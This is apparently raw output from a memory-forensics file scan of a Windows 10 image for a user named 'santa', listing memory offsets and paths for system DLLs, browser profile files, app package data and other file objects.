+0x918b76c3e8d0	\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.30_none_788560eb0ef1f3b0\wcp.dll	216
+0x918b76c3ea60	\Windows\System32\appraiser.dll	216
+0x918b76c3ebf0	\ProgramData\USOShared\Logs\NotificationUxBroker.c139137b-83b1-4da1-b306-622cab502fe6.1.etl	216
+0x918b76c3ed80	\CMApi	216
+0x918b76c3f0a0	\Windows\SysWOW64\CoreUIComponents.dll	216
+0x918b76c3f230	\gecko.4576.3988.7767695392285246638	216
+0x918b76c3f3c0	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b76c3f550	\Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.18362.30_none_210ac8966535eaa7	216
+0x918b76c3f870	\Windows\System32\srclient.dll	216
+0x918b76c3fa00	\gecko.4576.3988.7767695392285246638	216
+0x918b76c3fb90	\Windows\System32\config\COMPONENTS{fd9a35c3-49fe-11e9-aa2c-248a07783950}.TM.blf	216
+0x918b76c3feb0	\Windows\Prefetch\USOCOREWORKER.EXE-C7204344.pf	216
+0x918b76c40360	\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.30_none_788560eb0ef1f3b0\CbsCore.dll	216
+0x918b76c404f0	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\places.sqlite	216
+0x918b76c40680	\Users\santa\AppData\Local\Microsoft\EdgeUpdate\1.3.181.5\msedgeupdateres_en.dll	216
+0x918b76c40810	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db	216
+0x918b76c409a0	\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.30_none_788560eb0ef1f3b0\drupdate.dll	216
+0x918b76c40cc0	\ProgramData\USOShared\Logs\NotificationUxBroker.a7a36037-3ce8-4ec4-9156-3161dd9df5c3.1.etl	216
+0x918b76c40e50	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData	216
+0x918b76c41170	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b76c41300	\Windows\System32\mssvp.dll	216
+0x918b76c41490	\Windows\Prefetch\MPSIGSTUB.EXE-4D562760.pf	216
+0x918b76c41620	\Windows\System32\devinv.dll	216
+0x918b76c417b0	\Program Files (x86)\Mozilla Firefox	216
+0x918b76c41ad0	\$Directory	216
+0x918b76c41c60	\Windows\System32\SearchProtocolHost.exe	216
+0x918b76c41df0	\Program Files (x86)\Mozilla Firefox	216
+0x918b76c42110	\Windows\SysWOW64\winnsi.dll	216
+0x918b76c425c0	\Windows\System32	216
+0x918b76c428e0	\Windows\DiagTrack\RemoteAggregatorTriggerCriteria.dat	216
+0x918b76c42a70	\Program Files\WindowsApps\Microsoft.VCLibs.140.00.UWPDesktop_14.0.32530.0_x64__8wekyb3d8bbwe\vcruntime140.dll	216
+0x918b76c42c00	\Users\santa\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk	216
+0x918b76c42d90	\Windows\Prefetch\SPPSVC.EXE-7B160CA5.pf	216
+0x918b76c430b0	\CMApi	216
+0x918b76c43240	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{2773188F-807D-421F-A1B6-5644661909DA}.catalogItem	216
+0x918b76c433d0	\Windows\Registration\R000000000006.clb	216
+0x918b76c43560	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{28F6A877-7AF5-4A73-BD3E-BBBC65150B75}.catalogItem	216
+0x918b76c436f0	\Windows	216
+0x918b76c43a10	\Windows\WinSxS\FileMaps\$$.cdf-ms	216
+0x918b76c43d30	\Windows\Registration\R000000000006.clb	216
+0x918b76c43ec0	\Users\santa\Documents\desktop.ini	216
+0x918b76c44370	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.SkypeApp_15.108.3205.0_x64__kzf8qxf38zg5c\S-1-5-21-1046918562-1299961717-1331875240-1001.pckgdep	216
+0x918b76c44500	\Windows\SysWOW64\twinapi.dll	216
+0x918b76c44690	\Program Files\WindowsApps\Microsoft.SkypeApp_15.108.3205.0_x64__kzf8qxf38zg5c\Skype\SkypeContext.dll	216
+0x918b76c44820	\$Directory	216
+0x918b76c449b0	\ProgramData\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-wal	216
+0x918b76c44b40	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1046918562-1299961717-1331875240-1001.pckgdep	216
+0x918b76c44cd0	\Windows\System32\apisampling.dll	216
+0x918b76c44e60	\Windows\appcompat\Programs\EncapsulationLogging.hve	216
+0x918b76c45180	\LOCAL\cubeb-pipe-4576-11	216
+0x918b76c45310	\Windows\appcompat\Programs\EncapsulationLogging.hve.LOG1	216
+0x918b76c454a0	\Windows\System32\en-US\kernel32.dll.mui	216
+0x918b76c45630	\Program Files\WindowsApps\Microsoft.VCLibs.140.00.UWPDesktop_14.0.32530.0_x64__8wekyb3d8bbwe\vcruntime140_1.dll	216
+0x918b76c457c0	\Program Files\WindowsApps\Microsoft.VCLibs.140.00.UWPDesktop_14.0.32530.0_x64__8wekyb3d8bbwe\vccorlib140.dll	216
+0x918b76c45950	\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\PartyWin.dll	216
+0x918b76c45ae0	\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\eModel.dll	216
+0x918b76c45c70	\CMNotify	216
+0x918b76c45e00	\$Directory	216
+0x918b76c46120	\$Directory	216
+0x918b76c462b0	\Users\santa\Favorites\desktop.ini	216
+0x918b76c46440	\Windows\System32\pcacli.dll	216
+0x918b76c465d0	\Windows\appcompat\Programs\EncapsulationLogging.hve.LOG2	216
+0x918b76c46760	\CMApi	216
+0x918b76c468f0	\Users\santa\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1680_1050_POS4.jpg	216
+0x918b76c46a80	\Users\santa\Links\desktop.ini	216
+0x918b76c46c10	\Windows\System32\Windows.ApplicationModel.Store.dll	216
+0x918b76c46da0	\Users\santa\Contacts\desktop.ini	216
+0x918b76c470c0	\Users\santa\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	216
+0x918b76c47250	\Program Files\Windows Defender\EppManifest.dll	216
+0x918b76c473e0	\Windows\SysWOW64\winrnr.dll	216
+0x918b76c47570	\Program Files (x86)\Mozilla Firefox\gkcodecs.dll	216
+0x918b76c47700	\Windows\SysWOW64\ktmw32.dll	216
+0x918b76c47890	\Windows\System32\en-US\rpcrt4.dll.mui	216
+0x918b76c47bb0	\Windows\SysWOW64\propsys.dll	216
+0x918b76c47d40	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{705BA990-0A9C-4A9F-A7C7-6BABF1AA8561}.catalogItem	216
+0x918b76c481f0	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{78F02305-4404-49C5-A8E5-A254035C0D00}.catalogItem	216
+0x918b76c48380	\Program Files (x86)\Mozilla Firefox\lgpllibs.dll	216
+0x918b76c48510	\$Directory	216
+0x918b76c486a0	\CMApi	216
+0x918b76c48830	\Windows\SysWOW64\dbghelp.dll	216
+0x918b76c489c0	\Program Files (x86)\Mozilla Firefox\xul.dll	216
+0x918b76c48b50	\Windows\System32\werconcpl.dll	216
+0x918b76c48ce0	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db	216
+0x918b76c48e70	\Windows\SysWOW64\uxtheme.dll	216
+0x918b76c49190	\Users\santa\AppData\Local\Mozilla\Firefox\SkeletonUILock-dc0b1b25	216
+0x918b76c49320	\Program Files (x86)\Mozilla Firefox\nss3.dll	216
+0x918b76c494b0	\LOCAL\cubeb-pipe-4576-11	216
+0x918b76c49640	\gecko.4576.3988.7509070130796334379	216
+0x918b76c497d0	\Windows\System32\zipfldr.dll	216
+0x918b76c49960	\Windows\System32\winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx	216
+0x918b76c49af0	\Windows\System32	216
+0x918b76c49c80	\Windows\SysWOW64\ntmarta.dll	216
+0x918b76c49e10	\Users\santa\Saved Games\desktop.ini	216
+0x918b76c4a130	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{6846259E-BE8D-4862-8F7D-56766A0C1B25}.catalogItem	216
+0x918b76c4a2c0	\Windows\SysWOW64\wsock32.dll	216
+0x918b76c4a770	\Windows\System32\D3D12.dll	216
+0x918b76c4a900	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{839C59D0-6565-477F-90A2-9982A4FB6C68}.catalogItem	216
+0x918b76c4aa90	\CMApi	216
+0x918b76c4ac20	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{7A9E1E0B-D13E-488D-9D39-AB555896082D}.catalogItem	216
+0x918b76c4b0d0	\$Directory	216
+0x918b76c4b260	\Windows\ImmersiveControlPanel\pris\resources.en-US.pri	216
+0x918b76c4b3f0	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Temp\Dow3CDC.tmp	216
+0x918b76c4b580	\Windows\System32	216
+0x918b76c4b710	\Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\Logs\Log-GameBarLoggingSession-1.etl	216
+0x918b76c4bbc0	\Windows\SysWOW64\NapiNSP.dll	216
+0x918b76c4bd50	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\parent.lock	216
+0x918b76c4bee0	\Windows\Fonts\cambria.ttc	216
+0x918b76c4c200	\Program Files (x86)\Mozilla Firefox\browser\omni.ja	216
+0x918b76c4c390	\Windows\System32\ApplicationFrameHost.exe	216
+0x918b76c4c520	\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe	216
+0x918b76c4c840	\Windows\System32\eShims.dll	216
+0x918b76c4c9d0	\Sessions\1\AppContainerNamedObjects\S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194	216
+0x918b76c4cb60	\Windows\Prefetch\GAMEBARFTSERVER.EXE-5CD4C30E.pf	216
+0x918b76c4ccf0	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{79C1C918-E8E6-4677-97FF-FA895DE7EC72}.catalogItem	216
+0x918b76c4ce80	\Windows\System32	216
+0x918b76c4d1a0	\Windows\SysWOW64\dbgcore.dll	216
+0x918b76c4d330	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{7B761C10-8206-40A4-B307-DB82578FD72C}.catalogItem	216
+0x918b76c4d4c0	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.MicrosoftEdge_44.18362.1.0_neutral__8wekyb3d8bbwe\ActivationStore.dat	216
+0x918b76c4d650	\$Directory	216
+0x918b76c4d7e0	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{9552323B-F7B9-43CE-8A02-4A183C60D532}.catalogItem	216
+0x918b76c4d970	\CMApi	216
+0x918b76c4db00	\Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings\settings.dat	216
+0x918b76c4dc90	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat	216
+0x918b76c4de20	\Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings\settings.dat.LOG2	216
+0x918b76c4e140	\Windows\System32\en-US\windows.storage.dll.mui	216
+0x918b76c4e2d0	\Windows\Registration\R000000000006.clb	216
+0x918b76c4eaa0	\$Directory	216
+0x918b76c4ec30	\Windows\System32	216
+0x918b76c4f0e0	\ProgramData\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\S-1-5-21-1046918562-1299961717-1331875240-1001\SystemAppData\Helium\Cache\c37c8b2035625a33.dat	216
+0x918b76c4f270	\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll	216
+0x918b76c4f400	\$Directory	216
+0x918b76c4f590	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{87AF66AC-E501-4D45-8CDA-9EF297CFF3B2}.catalogItem	216
+0x918b76c4f720	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	216
+0x918b76c4f8b0	\Windows\Registration\R000000000006.clb	216
+0x918b76c4fa40	\ProgramData\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\S-1-5-21-1046918562-1299961717-1331875240-1001\SystemAppData\Helium\Cache\c37c8b2035625a33_COM15.dat	216
+0x918b76c4fbd0	\CMNotify	216
+0x918b76c4fd60	\Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings\settings.dat.LOG1	216
+0x918b76c4fef0	\Program Files (x86)\desktop.ini	216
+0x918b76c50080	\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\eData.dll	216
+0x918b76c50210	\Windows\System32\XblAuthManagerProxy.dll	216
+0x918b76c503a0	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b76c50530	\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx	216
+0x918b76c506c0	\Program Files (x86)\Mozilla Firefox\omni.ja	216
+0x918b76c50850	\Windows\SysWOW64\winmm.dll	216
+0x918b76c509e0	\Windows\System32	216
+0x918b76c50b70	\ProgramData\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\S-1-5-21-1046918562-1299961717-1331875240-1001\SystemAppData\Helium\Cache\c37c8b2035625a33_COM15.dat.LOG2	216
+0x918b76c50d00	\ProgramData\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\S-1-5-21-1046918562-1299961717-1331875240-1001\SystemAppData\Helium\Cache\c37c8b2035625a33.dat	216
+0x918b76c50e90	\Windows\Registration\R000000000006.clb	216
+0x918b76c511b0	\Users\desktop.ini	216
+0x918b76c51340	\Windows\System32\svchost.exe	216
+0x918b76c514d0	\Windows\System32\en-US\kernel32.dll.mui	216
+0x918b76c51660	\Users\santa\Videos\Captures\desktop.ini	216
+0x918b76c517f0	\Users\santa\Pictures\wallpaper.png	216
+0x918b76c51980	\Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\INetCache\ZA002JGD\ab[1].json	216
+0x918b76c51b10	\Windows\System32\ShellExperiences\WindowsInternal.Xaml.Controls.Tabs.dll	216
+0x918b76c51ca0	\CMApi	216
+0x918b76c51e30	\Windows\System32\Windows.WARP.JITService.exe	216
+0x918b76c52150	\ProgramData\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\S-1-5-21-1046918562-1299961717-1331875240-1001\SystemAppData\Helium\Cache\465f7e52ad88feb7.dat	216
+0x918b76c522e0	\CMNotify	216
+0x918b76c52470	\Windows\Fonts\segoeui.ttf	216
+0x918b76c52600	\Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20231118133215.txt	216
+0x918b76c52790	\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\XboxGameBarFT.winmd	216
+0x918b76c52920	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	216
+0x918b76c52ab0	\Windows\System32\en-US\crypt32.dll.mui	216
+0x918b76c52c40	\Windows\rescache\_merged\1348407519\4258637282.pri	216
+0x918b76c52dd0	\$Directory	216
+0x918b76c530f0	\Users\santa\AppData\Local\Mozilla\Firefox\Profiles\888jya8e.default-release\startupCache\scriptCache-current.bin	216
+0x918b76c53280	\Windows\SysWOW64\nlaapi.dll	216
+0x918b76c53410	\Windows\System32\Windows.System.Profile.RetailInfo.dll	216
+0x918b76c53730	\Windows\System32\AssignedAccessRuntime.dll	216
+0x918b76c538c0	\Windows\SysWOW64\WinTypes.dll	216
+0x918b76c53a50	\ProgramData\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\S-1-5-21-1046918562-1299961717-1331875240-1001\SystemAppData\Helium\Cache\c37c8b2035625a33_COM15.dat.LOG1	216
+0x918b76c53be0	\Windows\System32\taskhostw.exe	216
+0x918b76c53d70	\Windows\System32\Windows.System.Diagnostics.dll	216
+0x918b76c54220	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b76c543b0	\Windows\SysWOW64\winmmbase.dll	216
+0x918b76c54540	\Windows\SysWOW64\webauthn.dll	216
+0x918b76c546d0	\Windows\SysWOW64\devobj.dll	216
+0x918b76c54860	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppLockscreen\wallpaper.png	216
+0x918b76c549f0	\Windows\SysWOW64\wshbth.dll	216
+0x918b76c54ea0	\$Directory	216
+0x918b76c551c0	\Windows\System32\en-US\mswsock.dll.mui	216
+0x918b76c554e0	\Windows\bcastdvr\KnownGameList.bin	216
+0x918b76c55670	\$Directory	216
+0x918b76c55990	\Windows\System32\en-US\winnlsres.dll.mui	216
+0x918b76c55b20	\$Directory	216
+0x918b76c55cb0	\srvsvc	216
+0x918b76c55e40	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b76c56160	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppLockscreen\wallpaper.png	216
+0x918b76c56480	\Windows\System32\browserbroker.dll	216
+0x918b76c567a0	\Endpoint	216
+0x918b76c56930	\Windows\System32\duser.dll	216
+0x918b76c56ac0	\Windows\System32\en-US\mswsock.dll.mui	216
+0x918b76c56c50	\Users\santa\Pictures\desktop.ini	216
+0x918b76c56de0	\Windows\SysWOW64\dhcpcsvc.dll	216
+0x918b76c57100	\Windows\System32\browser_broker.exe	216
+0x918b76c57420	\AsyncConnectHlp	216
+0x918b76c575b0	\gecko.4576.3988.11027459119419464105	216
+0x918b76c57740	\Windows\SysWOW64\netprofm.dll	216
+0x918b76c578d0	\gecko.4576.3988.11027459119419464105	216
+0x918b76c57a60	\Windows\Registration\R000000000006.clb	216
+0x918b76c57bf0	\Endpoint	216
+0x918b76c57d80	\$Directory	216
+0x918b76c580a0	\Endpoint	216
+0x918b76c583c0	\Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	216
+0x918b76c58550	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edb.log	216
+0x918b76c586e0	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb	216
+0x918b76c58870	\Users\santa\AppData\Local\Mozilla\Firefox\Profiles\888jya8e.default-release\cache2\entries\90986EF1909EF6B5244F9775F7FBF9E3ADD68DE9	216
+0x918b76c58a00	\$Directory	216
+0x918b76c58b90	\Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	216
+0x918b76c58d20	\Windows\System32\ClipSVC.dll	216
+0x918b76c58eb0	\Windows\SystemResources\Windows.UI.ShellCommonInetCore\pris\Windows.UI.ShellCommonInetCore.en-US.pri	216
+0x918b76c591d0	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edb.log	216
+0x918b76c59360	\$Directory	216
+0x918b76c594f0	\Windows\Registration\R000000000006.clb	216
+0x918b76c59680	\$Directory	216
+0x918b76c59810	\$Directory	216
+0x918b76c599a0	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.jfm	216
+0x918b76c59cc0	\Windows\System32\RuntimeBroker.exe	216
+0x918b76c59e50	\Users\santa\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.jfm	216
+0x918b76c5a170	\Windows\System32\ActivationClient.dll	216
+0x918b76c5a300	\Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	216
+0x918b76c5a490	\Windows\System32\AppExtension.dll	216
+0x918b76c5a620	\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Home.swidtag	216
+0x918b76c5a7b0	\CMNotify	216
+0x918b76c5a940	\Windows\SystemResources\shell32.dll.mun	216
+0x918b76c5aad0	\$Directory	216
+0x918b76c5ac60	\Windows\System32\dllhost.exe	216
+0x918b76c5adf0	\Windows\System32\en-US\windows.storage.dll.mui	216
+0x918b76c5b110	\Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\MetaData	216
+0x918b76c5b2a0	\Windows\Fonts\times.ttf	216
+0x918b76c5b430	\Windows\SoftwareDistribution\DataStore\Logs\edbtmp.log	216
+0x918b76c5b5c0	\Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	216
+0x918b76c5b750	\Users\santa\AppData\Local\Microsoft\Windows\WebCache\V01tmp.log	216
+0x918b76c5b8e0	\Windows\System32\en-US\wshqos.dll.mui	216
+0x918b76c5ba70	\Sessions\1\AppContainerNamedObjects\S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194\1821068571-1793888307-623627345-1529106238	216
+0x918b76c5bc00	\Windows\System32\MicrosoftEdgeSH.exe	216
+0x918b76c5bd90	\Windows\Registration\R000000000006.clb	216
+0x918b76c5c0b0	\Endpoint	216
+0x918b76c5c240	\Windows\System32\CapabilityAccessManager.dll	216
+0x918b76c5c3d0	\Windows\System32\en-US\crypt32.dll.mui	216
+0x918b76c5c6f0	\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\Xbox.Experimentation.dll	216
+0x918b76c5c880	\Windows\SysWOW64\InputHost.dll	216
+0x918b76c5ca10	\Windows\System32\oleaut32.dll	216
+0x918b76c5cba0	\$Directory	216
+0x918b76c5cd30	\Endpoint	216
+0x918b76c5cec0	\Windows\System32\cdprt.dll	216
+0x918b76c5d1e0	\Program Files (x86)\Mozilla Firefox\firefox.exe	216
+0x918b76c5d500	\Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	216
+0x918b76c5d820	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db	216
+0x918b76c5d9b0	\Windows	216
+0x918b76c5db40	\Program Files (x86)\Mozilla Firefox	216
+0x918b76c5e180	\Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.18362.30_none_210ac8966535eaa7	216
+0x918b76c5e4a0	\Windows\Fonts\arial.ttf	216
+0x918b76c5e630	\Windows\System32\cellulardatacapabilityhandler.dll	216
+0x918b76c5e950	\Program Files (x86)\Mozilla Firefox	216
+0x918b76c5eae0	\Windows\System32\C_1255.NLS	216
+0x918b76c5ec70	\Windows\System32\EdgeContent.dll	216
+0x918b76c5f120	\Windows\System32\Windows.System.Profile.SystemId.dll	216
+0x918b76c5f2b0	\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll	216
+0x918b76c5f5d0	\gecko.4576.3988.15626751180869662404	216
+0x918b76c5f760	\Windows\System32\Windows.System.UserProfile.DiagnosticsSettings.dll	216
+0x918b76c5f8f0	\Program Files\Common Files\microsoft shared\ink\tiptsf.dll	216
+0x918b76c5fa80	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db	216
+0x918b76c600c0	\Sessions\1\AppContainerNamedObjects\S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194\3513710562-3729412521-1863153555-1462103995	216
+0x918b76c60250	\gecko.4576.3988.15626751180869662404	216
+0x918b76c603e0	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\storage\default\https+++www.youtube.com\cache\caches.sqlite-wal	216
+0x918b76c60570	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\storage\default\https+++www.youtube.com\cache\caches.sqlite-shm	216
+0x918b76c60890	\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\Assets\SegXboxGB.ttf	216
+0x918b76c60a20	\Windows\SysWOW64\pnrpnsp.dll	216
+0x918b76c60bb0	\Windows\SysWOW64\twinapi.appcore.dll	216
+0x918b76c60d40	\Windows\Fonts\StaticCache.dat	216
+0x918b76c60ed0	\Windows\System32\en-US\user32.dll.mui	216
+0x918b76c611f0	\gecko.4576.3988.11432683184268803580	216
+0x918b76c61380	\$Directory	216
+0x918b76c61510	\Endpoint	216
+0x918b76c616a0	\Users\santa\AppData\Local\Microsoft\Windows\Safety\edge\local\local\cache	216
+0x918b76c619c0	\Windows\Fonts\tahoma.ttf	216
+0x918b76c61b50	\wkssvc	216
+0x918b76c61ce0	\$Directory	216
+0x918b76c61e70	\CMApi	216
+0x918b76c624b0	\Windows\System32\svchost.exe	216
+0x918b76c62640	\Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	216
+0x918b76c62960	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\ActivationStore.dat	216
+0x918b76c62af0	\gecko.4576.3988.11432683184268803580	216
+0x918b76c62c80	\Windows\System32\drivers\monitor.sys	216
+0x918b76c62e10	\Windows\System32\UIRibbonRes.dll	216
+0x918b76c63130	\Windows\System32\MicrosoftEdgeCP.exe	216
+0x918b76c632c0	\CMApi	216
+0x918b76c63450	\Windows\Prefetch\DLLHOST.EXE-B331F1D0.pf	216
+0x918b76c635e0	\gecko.4576.3988.7509070130796334379	216
+0x918b76c63900	\Windows\Fonts\seguisb.ttf	216
+0x918b76c63a90	\Program Files (x86)\Mozilla Firefox\firefox.exe	216
+0x918b76c63c20	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\favicons.sqlite	216
+0x918b76c63db0	\ProgramData\Microsoft\Windows\OneSettings\UsoSettings.json	216
+0x918b76c640d0	\Windows\Fonts\arial.ttf	216
+0x918b76c64260	\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	216
+0x918b76c64580	\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\Assets\BS_Static_Regular.ttf	216
+0x918b76c64710	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\favicons.sqlite-wal	216
+0x918b76c64a30	\Users\santa\Pictures\cool-santa-claus.jpg	216
+0x918b76c64bc0	\$Directory	216
+0x918b76c64d50	\ProgramData\Microsoft\Windows Defender\Definition Updates\{D62DB865-2BF3-4866-A4B8-E44E0FC98F75}\mpavdlta.vdm	216
+0x918b76c64ee0	\Windows\System32\en-US\ApplicationFrame.dll.mui	216
+0x918b76c65390	\Windows\SysWOW64\BCP47mrm.dll	216
+0x918b76c65520	\Windows\System32\en-US\crypt32.dll.mui	216
+0x918b76c656b0	\$Directory	216
+0x918b76c65840	\Windows\System32\appinfo.dll	216
+0x918b76c659d0	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b76c65b60	\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\Assets\SegXbox2.ttf	216
+0x918b76c65cf0	\Windows\Fonts\seguiemj.ttf	216
+0x918b76c65e80	\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\Assets\BS_Static_Regular.ttf	216
+0x918b76c661a0	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\protections.sqlite	216
